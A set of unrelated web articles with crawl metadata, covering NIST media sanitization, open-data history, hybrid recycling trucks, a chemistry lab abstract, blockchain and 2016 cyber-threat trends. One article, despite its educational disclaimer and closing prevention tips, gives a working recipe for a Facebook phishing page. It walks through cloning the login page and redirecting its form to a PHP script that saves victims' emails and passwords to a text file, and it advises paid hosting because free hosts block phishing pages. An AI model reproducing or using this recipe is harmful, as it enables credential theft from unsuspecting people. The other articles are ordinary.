provide information about moving objects such as, but not limited to, information about past locations of moving objects and information about sizes of moving objects. Certain embodiments may also include other features such as zoom windows, playback controls, and graphical imagery added to a display to highlight moving objects.
<urn:uuid:a8549808-5e62-4669-b5ab-c0bbec43f742>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/analysis-inc-299386/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00275-ip-10-171-10-108.ec2.internal.warc.gz
en
0.900679
1,157
2.53125
3
Handling the tail end of the IT life cycle Hints from NIST - By William Jackson - Apr 27, 2007 The National Institute of Standards and Technology has some advice for agencies getting rid of digital storage media: Shred. Disintegrate. Pulverize. Incinerate. Melt. These are ways to get rid of disks, tapes and other devices for which the ultimate sanction, disposal with extreme prejudice, has been decreed. NIST Special Publication 800-88, 'Guidelines for Media Sanitization,' lays out the accepted methods for ensuring that sensitive data is not compromised when information technology systems are retired or otherwise eliminated. Getting rid of electronic data can be difficult, and the amount of effort you should expend on it depends on the type of information and what you plan to do with the computer, disk or hard drive when you are finished with it. Destroying disks, hard drives and other hardware is the most effective way to protect data, but NIST warns that federal law requires that 'whenever possible, excess equipment and media should be made available to schools and nonprofit organizations.' So some risk assessment is required. NIST defines four levels of sanitization: - Disposal. The simplest method: it involves just throwing the media away. It is obviously for the least-sensitive data. - Clearing. This makes data unretrievable by 'a robust keyboard attack,' which includes the use of recovery utilities. Overwriting is an acceptable means of clearing for undamaged media. - Purging. A higher level that resists data recovery by sophisticated laboratory attacks. Degaussing is effective for purging, but it cannot be used on nonmagnetic storage, such as CDs and DVDs. The firmware Secure Erase capability in Advanced Technology Attachment hard drives is an overwriting technique that satisfies both Clear and Purge requirements. - Destroying. What NIST calls the 'ultimate form of sanitization.' Paper and flexible media such as tapes and floppy disks can be shredded, but incineration, pulverization, disintegration or melting is required for more robust hardware. This often must be done at a specialized outside facility that can perform the work effectively and safely. The first step in selecting the appropriate level and method of sanitization is to categorize the sensitivity of the data using FIPS 199, 'Standards for Security Categorization of Federal Information and Information Systems.' NIST lays out the decision-making process for each category in SP 800-88. Generally, media with low-sensitivity data can simply be cleared if the agency is going to retain the device, but should be purged if the device is leaving the agency's control. For moderate and highly sensitive data, media should be destroyed if it is not being reused. Media with highly sensitive data can be purged if the agency is retaining the device. If the data is only moderately sensitive, the device can be cleared if it will be retained, but must be purged if it is leaving the agency's control.
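The decision flow summarized in the last paragraph can be captured in a few lines. The following is an informal sketch, not an official NIST tool; in particular, destroying highly sensitive media that leaves agency control is an assumption noted in the comments rather than something the article states.

def sanitization_level(sensitivity: str, leaving_agency_control: bool, reuse: bool) -> str:
    # sensitivity is 'low', 'moderate' or 'high' (per a FIPS 199 categorization);
    # leaving_agency_control is True if the media will leave the agency;
    # reuse is True if the device will be reused rather than discarded.
    if sensitivity == "low":
        return "purge" if leaving_agency_control else "clear"
    if not reuse:
        return "destroy"  # moderate or highly sensitive data on media that will not be reused
    if sensitivity == "moderate":
        return "purge" if leaving_agency_control else "clear"
    # Highly sensitive data: the article says purge when the agency keeps the device;
    # destroying it when it leaves agency control is an assumption, not stated above.
    return "destroy" if leaving_agency_control else "purge"

print(sanitization_level("moderate", leaving_agency_control=True, reuse=True))   # purge
print(sanitization_level("low", leaving_agency_control=False, reuse=True))       # clear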
<urn:uuid:d263d541-0434-4248-9d9f-3bd54c75116c>
CC-MAIN-2017-09
https://gcn.com/articles/2007/04/27/handling-the-tail-end-of-the-it-life-cycle.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00327-ip-10-171-10-108.ec2.internal.warc.gz
en
0.911074
636
2.671875
3
First of all, let me tell you one thing. This article is written only to educate people about how phishing works and how they should prevent phishing scams. Please don't use these techniques for malicious purposes. What is Phishing? Phishing is one of the most popular techniques used for hacking passwords and stealing sensitive information like credit cards, banking usernames and passwords, and so on. Phishing, also known as a fishing attack, is the process of creating a duplicate copy or clone of a reputed website with the intention of stealing a user's password or other sensitive information like credit card details. It is easy for anyone with a little technical knowledge to get a phishing page done, and that is why this method is so popular. Phishing scams prompt users to enter sensitive details on a fake webpage (phishing page) whose look and feel are very similar to the legitimate webpage. In most cases, the only difference is the URL. The URL can also be spoofed in some cases if the legitimate website is vulnerable. It is difficult for a commoner to identify a phishing page because of its trustworthy layout. How phishing works: Hackers and attackers target the general public and send them phishing links through email or personal messages, where the victim is prompted to click on a link in the message. The victim is then navigated to a phishing page that pretends to be legitimate. People who don't find that phishing page suspicious are induced to enter their sensitive information, and all of the information is sent to the hacker. Let's take Facebook as an example. The attacker creates a page that looks exactly like the Facebook login page but hosts it at a different URL, like fakebook.com or faecbook.com, or any URL that pretends to be legitimate. When users land on such a page, they might think it is the real Facebook login page asking them to provide their username and password. People who don't find the fake login page suspicious may enter their username and password; the password information is sent to the hacker who created the page, while the victim is redirected to the original Facebook page. Real-life example: John is a programmer. He creates a Facebook login page with some scripts that enable him to get the username and password information, and he puts it at https://www.facebouk.com/make-money-online-tricks. Peter is a friend of John. John sends a message to Peter: "Hey Peter, I found a way to make money online easily, you should definitely take a look at this https://www.facebouk.com/make-money-online-tricks". Peter navigates to the link and sees a Facebook login page. As usual, Peter enters his Facebook username and password. Now the username and password of Peter are sent to John, and Peter gets redirected to a money-making-tips page https://www.facebouk.com/make-money-online-tricks-tips.html. That's all it takes; Peter's Facebook account is hacked. How to create a Phishing page in minutes? We are going to take a Facebook phishing page as an example. - Go to Facebook.com, make sure you are not logged in to Facebook. - Press Ctrl + U to view source code. - Copy the source code and paste it in a notepad. - Find the action attribute of the login form in the code. Search for keyword "action" without quotes by pressing Ctrl + F in notepad.
In the Facebook login page, the action attribute is filled with the Facebook login process URL; replace it with process.php - You have to find the names of the input fields using inspect element (Ctrl + Shift + I in Chrome); in our case they are email and pass - Save this file as index.html - Now you have to get the username and password stored in a text file named phishing.txt - Create a file named process.php using the following code. if(isset($_POST[’email’]) && isset($_POST[‘pass’])) $phishing = fopen(“phishing.txt”,”w”); fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”\n”); How to host a phishing page at a URL? To put a phishing page at a URL, you need two things: a domain and web hosting. Get a Free Domain: You can create a free domain at Bluehost if you pay for their hosting plans. Once you create a domain, you need to get hosting and set up name servers for it. If you select Bluehost you don't need to set up name servers since they will already be set. Get Web Hosting: Almost all free hosting panels would block phishing pages, so you would need a paid shared hosting package, which costs around $4 USD per month. I prefer Bluehost for their excellent service and performance. Once you set up the domain and hosting, you can upload the files using FTP software. That's all; you can test it now. How could you protect yourself from phishing scams? Hackers can reach you in many ways: email, personal messages, Facebook messages, website ads and so on. Clicking any link in these messages could lead you to a login page. Whenever an email navigates you to a webpage, you should note one thing above all, the URL, because nobody can spoof the URL except when there is an XSS zero-day vulnerability. What is the URL you see in the browser address bar? Is that really https://www.LEGITWEBSITE.com? Is there a green secure symbol (HTTPS) in the address bar? You can prevent being hacked by remembering these questions (a small programmatic check along these lines is sketched at the end of this article). Also see the examples of Facebook phishing pages below. Perfect Phishing Pages: Most people won't suspect such a page (snapshot given above) since there is an https prefix with a green secure icon and no mistake in www.facebook.com. But this is a phishing page. How? Look at the URL carefully: it is https://www.facebook.com.infoknown.com, so www.facebook.com is merely a subdomain of infoknown.com. Google Chrome does not visually distinguish the subdomain from the registered domain the way Firefox does. SSL certificates (HTTPS) can be obtained from many vendors, and a few vendors give an SSL certificate for free for one year. It's not a big deal for a novice to create a convincing phishing page like this, so be aware of it. Another variant is a normal Facebook phishing page with some modification in the word Facebook. Phishing scams are attempts by scammers, hackers and cybercriminals to trick you into entering your sensitive information, like internet banking usernames and passwords, credit card details and so on. As described above, phishing scams focus on retrieving monetary details indirectly. Most of the time, phishing scams happen through email. Hackers spoof the email address of a legitimate website or authority to send the phishing email, so users are convinced that the email was sent from a legit website. Email addresses can be easily spoofed using email headers, and server scripting languages like PHP make it easy to spoof the From address. Popular email services like Gmail are smart enough to identify phishing email and route it to the spam folder.
But still there are some ways for a hacker to send phishing emails.
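One practical takeaway from the URL advice above is that the facebook.com.infoknown.com trick can be caught programmatically. The following is a minimal Python sketch using only the standard library and is only an approximation; a production check would consult the public suffix list, for example via a library such as tldextract.

from urllib.parse import urlparse

def looks_like_impostor(url: str, expected_domain: str = "facebook.com") -> bool:
    # Return True if the URL's host merely contains the expected domain
    # (e.g. www.facebook.com.infoknown.com) instead of actually ending in it.
    host = urlparse(url).hostname or ""
    is_real = host == expected_domain or host.endswith("." + expected_domain)
    return expected_domain in host and not is_real

print(looks_like_impostor("https://www.facebook.com.infoknown.com/login"))  # True
print(looks_like_impostor("https://www.facebook.com/login"))                # False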
<urn:uuid:59ad1152-5139-445f-b46b-aa24b2de52fa>
CC-MAIN-2017-09
https://www.7xter.com/2016/08/phishing.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00327-ip-10-171-10-108.ec2.internal.warc.gz
en
0.882675
1,607
2.953125
3
A brief history of open data - By Luke Fretwell - Jun 09, 2014 In December 2007, 30 open-data pioneers gathered in Sebastopol, Calif., and penned a set of eight open-government data principles that inaugurated a new era of democratic innovation and economic opportunity. "The objective…was to find a simple way to express values that a bunch of us think are pretty common, and these are values about how the government could make its data available in a way that enables a wider range of people to help make the government function better," Harvard Law School Professor Larry Lessig said. "That means more transparency in what the government is doing and more opportunity for people to leverage government data to produce insights or other great business models." The eight simple principles -- that data should be complete, primary, timely, accessible, machine-processable, nondiscriminatory, nonproprietary and license-free -- still serve as the foundation for what has become a burgeoning open-data movement. In the seven years since those principles were released, governments around the world have adopted open-data initiatives and launched platforms that empower researchers, journalists and entrepreneurs to mine this new raw material and its potential to uncover new discoveries and opportunities. Open data has drawn civic hacker enthusiasts around the world, fueling hackathons, challenges, apps contests, barcamps and "datapaloozas" focused on issues as varied as health, energy, finance, transportation and municipal innovation. In the United States, the federal government initiated the beginnings of a wide-scale open-data agenda on President Barack Obama's first day in office in January 2009, when he issued his memorandum on transparency and open government, which declared that "openness will strengthen our democracy and promote efficiency and effectiveness in government." The president gave federal agencies three months to provide input into an open-government directive that would eventually outline what each agency planned to do with respect to civic transparency, collaboration and participation, including specific objectives related to releasing data to the public. In May of that year, Data.gov launched with just 47 datasets and a vision to "increase public access to high-value, machine-readable datasets generated by the executive branch of the federal government." When the White House issued the final draft of its federal Open Government Directive later that year, the U.S. open-government data movement got its first tangible marching orders, including a 45-day deadline to open previously unreleased data to the public. Now five years after its launch, Data.gov boasts more than 100,000 datasets from 227 local, state and federal agencies and organizations. "In May 2009, Data.gov was an experiment," Data.gov Evangelist Jeanne Holm wrote last month to mark the anniversary. "There were questions: Would people use the data? Would agencies share the data? And would it make a difference? We've all come a long way to answering those questions." 
The Obama administration continues to iterate and deepen its open-data efforts, most recently via a May 2013 executive order titled "Making Open and Machine-Readable the New Default for Government Information" and a supplementary Office of Management and Budget memo under the subject line of "Open Data Policy: Managing Information as an Asset," which created a framework to "help institutionalize the principles of effective information management at each stage of the information's life cycle to promote interoperability and openness." The directive also established the creation of Project Open Data, managed jointly by OMB and the Office of Science and Technology Policy. The centralized portal seeks to foster "a culture change in government where we embrace collaboration and where anyone can help us make open data work better," U.S. Chief Technology Officer Todd Park and CIO Steven VanRoekel wrote in May 2013 to announce the effort. Fully hosted on the social coding platform GitHub, Project Open Data offers tools, resources and case studies that can be used and enhanced by the community. Resources include an implementation guide, data catalog requirements, guidance for making a business case for open data, common core metadata schema, a sample chief data officer position description and more. Staying true to the spirit of openness As governments begin to implement open-data policies, following a flexible, iterative methodology is essential to the true spirit of openness. Through this process, Open Knowledge -- an international nonprofit organization devoted to "using advocacy, technology and training to unlock information" -- recommends keeping it simple by releasing "easy" data that will be a "catalyst for larger behavioral change within organizations," engaging early and actively, and immediately addressing any fear or misunderstanding that might arise during the process. Open Knowledge suggests four "simple" steps in the open-data implementation process: - Choose your dataset(s). - Apply an open license. - Make the data available. - Make it discoverable. From a more granular agency perspective, Project Open Data offers the following protocol: - Create and maintain an enterprise data inventory. - Create and maintain a public data listing. - Create a process to engage with customers to help facilitate and prioritize data release. - Document if data cannot be released. - Clarify roles and responsibilities for promoting efficient and effective data release. Furthermore, the technical fundamentals of open data include using machine-readable, open file formats such as XML, HTML, JSON, RDF or plain text -- as opposed to the pervasive, proprietary Portable Document Format created by Adobe. Former Philadelphia Chief Data Officer Mark Headd famously said, "When you put a PDF in your [GitHub] repo, an angel cries." Put a license on it Although government content is not subject to domestic copyright protection, it is important to put an open license on government data so that there is no confusion about how or whether it can be repurposed and distributed. In general, there are two options that meet the open definitions for licensing public data: public domain and share-alike. Much like the original eight open-government principles established in 2007, Open Knowledge outlines 11 conditions that must be met for data to qualify as open. (The White House has seven similar principles.) Those conditions relate to access, redistribution, reuse, attribution, integrity and distribution of license. 
They also specify that there should be no discrimination against people, groups or fields of endeavor; there should be no technological restrictions; and a license must not be specific to a package or restrict the distribution of other works. "In most jurisdictions, there are intellectual property rights in data that prevent third parties from using, reusing and redistributing data without explicit permission," Open Knowledge states in its "Open Data Handbook." "Even in places where the existence of rights is uncertain, it is important to apply a license simply for the sake of clarity. Thus, if you are planning to make your data available, you should put a license on it -- and if you want your data to be open, this is even more important." The chief data officer's role As open data's importance grows, an official government function has evolved in the form of the chief data officer. Cities, states, federal agencies and even countries are beginning to establish official roles to oversee open-data implementation. Municipalities (San Francisco, Chicago, Philadelphia), federal agencies (Federal Communications Commission, Federal Reserve Board), states (Colorado, New York) and countries (France) have, had or plan to have an executive-level chief data officer. According to Project Open Data's sample position description, the chief data officer is "part data strategist and adviser, part steward for improving data quality, part evangelist for data sharing, part technologist, and part developer of new data products." As with the newly popular chief innovation officer, the verdict is still out on whether that role and title will be widely adopted or will simply fall under the auspices of the agency CIO or CTO. Building an open-data strategy As governments begin to execute sustainable, successful open-data plans, Data.gov's Holm recommends that agencies create teams of key stakeholders composed not just of policy-makers but also internal data owners, including contractors and partners. The teams should think strategically about their mission and what they want to accomplish, and brainstorm how others might use the data. For example, the Interior Department announced the creation of a Data Services Board responsible for the agency's data practices, saying in a September 2013 memo that "it is crucial that this activity include mission and program individuals as well as IT specialists so that the entire data life cycle can be addressed and managed appropriately." Holm recommends that such teams meet every two to four weeks to accomplish their work and determine an appropriate frequency for getting together to maintain momentum. As more and more innovative government executives begin to strategize about the treasure trove of public information that could be set free and transform the way we live, the ecosystem's potential is unlimited.
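To make the "machine-readable by default" guidance above concrete, here is a minimal sketch of a catalog entry in the spirit of Project Open Data's common core metadata schema. It is illustrative only: the field names loosely follow that schema, but the dataset, agency, contact and URLs are invented for the example.

# Illustrative sketch: one catalog entry in the spirit of the Project Open Data
# common core metadata schema. The dataset, publisher and URLs are made up.
import json

entry = {
    "title": "Streetlight Outage Reports",
    "description": "Daily extract of reported streetlight outages.",
    "keyword": ["streetlights", "public works", "311"],
    "modified": "2014-06-01",
    "publisher": {"name": "Example City Department of Public Works"},
    "contactPoint": {"fn": "Open Data Coordinator", "hasEmail": "mailto:opendata@example.gov"},
    "accessLevel": "public",
    "license": "https://creativecommons.org/publicdomain/zero/1.0/",
    "distribution": [
        {"downloadURL": "https://data.example.gov/streetlights.csv", "mediaType": "text/csv"}
    ],
}

# Machine-processable, nonproprietary format with an explicit open license,
# echoing the original eight principles.
print(json.dumps(entry, indent=2))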
<urn:uuid:8ac7be6f-cdac-4351-b9d1-99844d202f0b>
CC-MAIN-2017-09
https://fcw.com/articles/2014/06/09/exec-tech-brief-history-of-open-data.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00503-ip-10-171-10-108.ec2.internal.warc.gz
en
0.926859
1,824
3.203125
3
To launch its single-stream recycling program, Ann Arbor, Mich., officials didn't have to look far to find a solution that could save money and fuel. In July, the city became the first in Michigan to purchase hydraulic hybrid trucks, built using technology pioneered by the U.S. Environmental Protection Agency's National Vehicle and Fuel Emissions Laboratory in Ann Arbor. Used for recycling collection, these garbage trucks don't store energy in batteries like most hybrid cars. Instead, the new hybrid system stores braking energy in hydraulic fluid, which then propels the trucks at initial acceleration. This makes the technology ideal for heavy-duty vehicles that do a lot of stop-and-go driving, such as shuttle buses and garbage trucks, because it boosts efficiency and keeps costs low. "There are more options than ever before to help people, businesses and government save money at the pump, reduce our dependence on oil and improve air quality," according to Sean Reed, founder and executive director of the nonprofit Clean Energy Coalition (CEC), an organization dedicated to expanding clean energy technologies in the state. "The role we take is to try to secure the funding necessary to make these things a total no-brainer." With a $40,000 price tag per truck, the solution wasn't cheap. But on behalf of Ann Arbor, the CEC secured a subgrant of about $156,000 from the American Recovery and Reinvestment Act to cover those costs, Reed said. "There are CECs all around that can help other municipalities as well," said James W. Parks, manager of communications for Eaton Corp., which manufactured the Hydraulic Launch Assist (HLA) system added to the trucks. "It's certainly helpful when there are incentives for the end-user." According to Eaton Corp., the city can expect fuel economy savings of up to 30 percent compared to a conventional diesel powertrain, and see return on investment in two to three years. The city estimates saving 1,000 gallons of diesel gas per truck every year, which equates to $73,000 in fuel savings and $26,500 in reduced maintenance costs for its four trucks over the 10-year service life. Also, with the new system, emissions should be cut down 20 to 30 percent, and the trucks should only need one brake job a year instead of four. Eaton touted other benefits of the hybrid trucks such as reduced launch noise (a hydraulic-powered launch is quieter than the diesel launch) and reduced braking noise, a common neighborhood complaint with large trucks. The HLA system launched last fall, which puts Ann Arbor's trucks among the first 25 deployed nationally with the hybrid technology, said Vince Duray, chief engineer at Eaton Corp. Other Eaton units have been shipped to Dallas/Ft. Worth and Houston. According to Chris Grundler, chief executive of the EPA's National Vehicle and Fuel Emissions Laboratory, heavy trucks account for about 20 percent of the nation's man-made emissions of carbon dioxide. Emissions from heavy trucks are growing faster than passenger cars.
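For readers who want to see how the city's numbers fit together, the short sketch below simply re-runs the figures stated above (1,000 gallons saved per truck per year, four trucks, a 10-year service life, $73,000 in fuel savings and $26,500 in reduced maintenance). The implied diesel price is derived from those figures and is not a number quoted in the article.

# Re-running the arithmetic from the article; all inputs are the article's own
# figures, and the implied fuel price is derived, not quoted.
trucks = 4
gallons_saved_per_truck_per_year = 1_000
service_life_years = 10
fuel_savings_total = 73_000.0         # dollars, per the article
maintenance_savings_total = 26_500.0  # dollars, per the article

gallons_saved = trucks * gallons_saved_per_truck_per_year * service_life_years
implied_diesel_price = fuel_savings_total / gallons_saved
total_savings = fuel_savings_total + maintenance_savings_total

print(f"Diesel saved over {service_life_years} years: {gallons_saved:,} gallons")
print(f"Implied diesel price: ${implied_diesel_price:.2f}/gallon")
print(f"Combined fuel and maintenance savings: ${total_savings:,.0f}")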
<urn:uuid:38021633-6877-4e2b-b17a-67a985e54258>
CC-MAIN-2017-09
http://www.govtech.com/technology/Hydraulics-on-Hybrid-Recycling-Trucks-to.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00447-ip-10-171-10-108.ec2.internal.warc.gz
en
0.956188
623
2.8125
3
HALF MOON BAY, Calif. – Experts at a recent technology conference agreed that blockchain has a bright future, but warned it may be a rocky ride until that future arrives. Blockchain is a distributed database that uses a secure digital ledger of transactions that users can share across a computer network. It’s also the technology behind virtual currency bitcoin. “When you are at the leading edge there will be mistakes. People will get a lot wrong in the next five years. I think of it kind of like running with scissors,” says Constellation Research analyst Steve Wilson at the Oct. 26 Connected Enterprise conference hosted by his company. [ Related: What is blockchain and how does it work? ] But blockchain enthusiast Richie Etwaru, chief digital officer at IMS Health, had a different take. He started by pointing to the colorful pair of sneakers he was wearing and noted he bought them using bitcoin, the controversial digital currency that’s been plagued by security issues. “I think blockchain is the biggest thing I’ve seen in my life,” says Etwaru. “I work in healthcare and bitcoin to blockchain is like what AOL chat was to the internet, and bitcoin is only one substantiation of blockchain.” Blockchain can help the healthcare industry build trust In the healthcare industry Etwaru says blockchain can help establish new business models that overcome what he describes as the massive absence of trust that exists today among patients, doctors, the pharmaceutical industry and the government. “We started thinking of how we can engineer trust into the network and the distributed ledger (i.e. blockchain) is a great way to solve the trust issue because the information is owned by everyone and no one, and can be seen by everyone and no one,” he says. “It’s immutable, you can’t reverse it, it’s pretty decently encrypted and it can be permissions-based.” [ Related: How CIOs explain blockchain to their CFO ] One example Etwaru points to is that trials for new drugs are often flawed because patients don’t trust how their information is going to be used. “With blockchain you could do things like citizen research for healthcare. There could be autonomous organizations like a Wikipedia of research on cancer based on an abundance of trust enabled by blockchain,” said Etwaru. Blockchain can disrupt the cybersecurity landscape Mike Kail,chief innovation officer at Cybric, a company that’s looking to “disrupt the cybersecurity landscape” with new services, says blockchain has got people thinking differently about what’s possible. Kail says blockchain technology promises to change the status quo of having to trust a broker to complete financial transactions to a system of automated, verifiable transactions that eliminates the middleman. Speaking more broadly, he says blockchain can bring more efficiency to every company with a supply chain challenge. [ Related: How blockchain will disrupt your business ] For companies looking to test the blockchain waters he suggests figuring out a small use case where you can apply blockchain methodology and monitor the results. Another speaker, Shawn Wiora, cofounder and CEO of Maxxsure, a cybersecurity and cyber insurance company, is using blockchain to offer new kinds of services. “We’re able to offer things like variable premiums for a cyber insurance policy that changes as your cyber profile changes,” said Wiora. “Does anyone else offer that?” he asked rhetorically. 
But even with some companies already innovating, veteran Silicon Valley product executive Chirag Mehta says blockchain’s best days are clearly ahead of it. “Blockchain looks like what the cloud looked like 10 or 15 years ago,” says Mehta, a former executive at SAP and adjunct professor at Santa Clara University where he teaches such topics as web services and cloud computing to graduate students. One difference he sees vs. the cloud though that’s surprised him, is that companies big and small seem to be interested in exploring blockchain’s potential. “Big companies weren’t as interested in the cloud in the early days,” says Mehta. “They weren’t as ready to jump in.” What blockchain does really well, he adds, is provide the technical integrity necessary to let you trust a series of events. “But don’t confuse that with security,” he emphasized. If blockchain needs a blue chip, big name advocate it has one in IBM. Aron Dutta, global head of blockchain at IBM, says he’s already running blockchain technology globally across industries. He sees blockchain as giving companies a way to rethink business models and make more money. Dutta says he has over 4,000 PhDs and 100,000 consultants he can call on to aid his work at IBM, so stay tuned. “It’s not about use cases,” he emphasizes. “It’s about business models.” David Needle is a technology journalist based in Silicon Valley. This story, "Why Blockchain’s growing pains will be worth it" was originally published by CIO.
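Mehta's point about technical integrity (that a blockchain lets you trust a series of events) comes down to hash chaining. The toy sketch below is not any production blockchain and is not what IBM or the other companies quoted here run; it only shows how linking each record to the hash of the previous one makes after-the-fact tampering detectable.

# Toy example only: a hash-chained ledger illustrating why past entries are hard
# to alter silently. Real blockchains add consensus, signatures and much more.
import hashlib, json

def make_block(prev_hash: str, payload: dict) -> dict:
    body = {"prev": prev_hash, "payload": payload}
    body["hash"] = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
    return body

def verify(chain: list) -> bool:
    for i, block in enumerate(chain):
        expected = {"prev": block["prev"], "payload": block["payload"]}
        digest = hashlib.sha256(json.dumps(expected, sort_keys=True).encode()).hexdigest()
        if digest != block["hash"] or (i > 0 and block["prev"] != chain[i - 1]["hash"]):
            return False
    return True

chain = [make_block("0" * 64, {"tx": "alice pays bob 5"})]
chain.append(make_block(chain[-1]["hash"], {"tx": "bob pays carol 2"}))
print(verify(chain))                      # True
chain[0]["payload"]["tx"] = "alice pays bob 500"
print(verify(chain))                      # False: tampering breaks the chain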
<urn:uuid:75c9efb1-042b-4767-83b8-a22ceadf8307>
CC-MAIN-2017-09
http://www.csoonline.com/article/3137004/security/why-blockchain-s-growing-pains-will-be-worth-it.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00499-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958114
1,095
2.546875
3
Cunningham W.P., Joseph C., Morey S., Santos Romo A., and 3 more authors (all Claudia Taylor Johnson High School). Journal of Chemical Education, 2015. A simplified activity examined gas density while employing cost-efficient syringes in place of traditional glass bulbs. The exercise measured the density of methane, with very good accuracy and precision, in both first-year high school and AP chemistry settings. The participating students were tasked with finding the density of a gas. The discovery activity facilitated their understanding of the basis of the table of atomic masses. This activity should provide instructors of pre-AP and AP chemistry classes with an acceptably precise and accurate single-lab-period investigation that functions either within the gas law unit or introduction to atomic theory and atomic masses. © 2015 The American Chemical Society and Division of Chemical Education, Inc.
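As a sanity check on what students in such an activity should measure, the ideal-gas estimate of methane's density is easy to compute. The quick sketch below assumes 0 °C and 1 atm (a 22.414 L/mol molar volume), since the abstract does not state the lab conditions.

# Ideal-gas estimate of methane density; the conditions (0 C, 1 atm) are an
# assumption, as the abstract does not specify lab temperature and pressure.
molar_mass_ch4 = 12.011 + 4 * 1.008    # g/mol, from standard atomic masses
molar_volume_stp = 22.414               # L/mol for an ideal gas at 0 C and 1 atm

density = molar_mass_ch4 / molar_volume_stp
print(f"CH4: {molar_mass_ch4:.2f} g/mol -> {density:.3f} g/L at 0 C and 1 atm")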
<urn:uuid:ce3fb72e-c655-498b-87aa-2130b8d1edfe>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/claudia-taylor-johnson-high-school-733127/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00499-ip-10-171-10-108.ec2.internal.warc.gz
en
0.893418
206
3.203125
3
The year 2016 will not only be remembered for Trump's surprise victory in the US election, or for Brexit, or for saying goodbye to so many public figures like David Bowie, Alan Rickman, Prince, Muhammad Ali and Carrie Fisher, just to name a few. Last year was also one of the most challenging for cyber-security. Hackers were busier than ever stealing valuable data and credentials, finding flaws in security systems and sending phishing campaigns to an ever-increasing number of victims – both businesses and individuals. What are some of the lessons we can take away from 2016 cyber-threats? The critical importance of cyber-hygiene. Nowadays, it is more vital than ever that passwords are changed regularly, and not only when a data breach goes public. 2016 was host to the biggest data breach ever recorded, suffered by the industry giant Yahoo. 500 million user accounts were stolen back in 2013, meaning that for 3 years, the compromised credentials of the users were probably on sale on the Dark Web. Since the breach wasn't made public for some time, it highlights the importance of regularly changing passwords as well as using strong passwords (a hard-to-guess combination of upper and lower case letters, numbers and symbols). The recommended time-frame to change one's passwords is every 3 months; however, research shows that most users don't apply this rule: a lot of the time, users stick to one single password for all of their accounts, and hardly ever change it. That is like gold to hackers who rely on users' sluggishness: if users never update their passwords, stolen credentials available on the Dark Web can remain accurate for months, even years; thus, the risk of users being hacked is skyrocketing. Hackers are now also meddling in political matters. The US Election hack is proof that the political landscape can evolve based on cyber-criminal hacks. The exposure of confidential and private emails has definitely cast a big shadow on Hillary Clinton's campaign, and even though the actual origin of the hack is to this day still unknown (state hackers? Anonymous? WikiLeaks?), this new trend is a game changer and raises the following question for 2017: will hackers interfere in other elections, such as in Germany or France in the next few months? Bigger targets mean bigger gains for criminals. In 2016, hackers focused on data breaches and targeted more large companies and organisations than ever before. Some of the (publicly disclosed) victims of massive data breaches were: Dropbox, LinkedIn, Verizon, Snapchat, Yahoo, Tumblr and Myspace; just to name a few. Millions of credentials were compromised. Note: this trend doesn't mean that small companies are less at risk. It's true that hackers now tend to target more and more of the big fish, but cyber-attacks on the small fry continue to rise, because they are easier prey, and are still very profitable. DDoS attacks proliferated. Distributed Denial of Service attacks continue to evolve rapidly, and are now used more than ever. In 2016, DDoS campaigns increased in frequency and size, with hackers making use of DNS and DNSSEC to intensify their offensive. The common link in almost all DDoS attacks is the widespread use of Internet of Things (IoT) botnets, created with malware to compromise insecure IoT devices. Mirai is the most frequently used malware in DDoS campaigns. Ransomware remained highly popular amongst hackers, and highly profitable too. 
Research showed that new ransomware samples increased by 80% in 2016, with a 600% growth in new ransomware variants. The industries most targeted by ransomware attacks were the financial sector, the educational sector and the health sector (especially hospitals). Hackers worked hard to lock these institutions out of their critical data, making it hard not to pay the ransom straight away. New ransomware variants, incorporating substantial technical advances, made their debut in 2016. Some advances included: the use of partial and full hard disk encryption (instead of encrypting single files); and the exploit of new delivery systems. The number of ransomware attacks rose frighteningly high, as did their efficiency and the ransom prices. This resulted in three alarming consequences: first, cyber-criminals used their profits to finance even more advanced threats and highly-evolved ransomware samples; second, more hackers turned their attention to this cheap yet lucrative type of cyber-attack; third, hackers are now also offering ransomware as a “service” for non-tech-savvy criminals. It is no wonder the number one security-threat for businesses in 2017 is ransomware attacks. 2016’s cyber-threat landscape in a nutshell: - 51% of Americans were affected by a security incident - Cyber-attacks cost an estimated $400 billion globally - Data breaches increased by 23% - The global average total cost of a data breach was $3.8 million - About 50% of American organisations underwent a ransomware attack - $209 million were paid to ransomware hackers in Q1 alone More than ever before, cyber-criminals in 2016 were focused on remaining one step ahead in the cyber game, by continuously improving their schemes and innovating with new threats. One thing is for sure: the only constant in cyber-criminality is the perpetual evolution of threats.
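One of the simplest lessons above, using strong and regularly rotated passwords, is easy to act on programmatically. The sketch below is a generic example built on Python's standard secrets module; the 16-character length and the required character classes are illustrative choices, not recommendations from the article.

# Generic strong-password generator using only the standard library.
import secrets
import string

def generate_password(length: int = 16) -> str:
    alphabet = string.ascii_letters + string.digits + string.punctuation
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        # Keep only candidates that mix upper case, lower case, digits and
        # symbols, matching the "hard-to-guess combination" described above.
        if (any(c.islower() for c in candidate) and any(c.isupper() for c in candidate)
                and any(c.isdigit() for c in candidate)
                and any(c in string.punctuation for c in candidate)):
            return candidate

print(generate_password())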
<urn:uuid:edd9df8b-44b4-4dcc-bfc7-1e6e21c69f81>
CC-MAIN-2017-09
https://fraudwatchinternational.com/industry-news/2016s-important-lessons-cyber-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00619-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955366
1,089
2.875
3
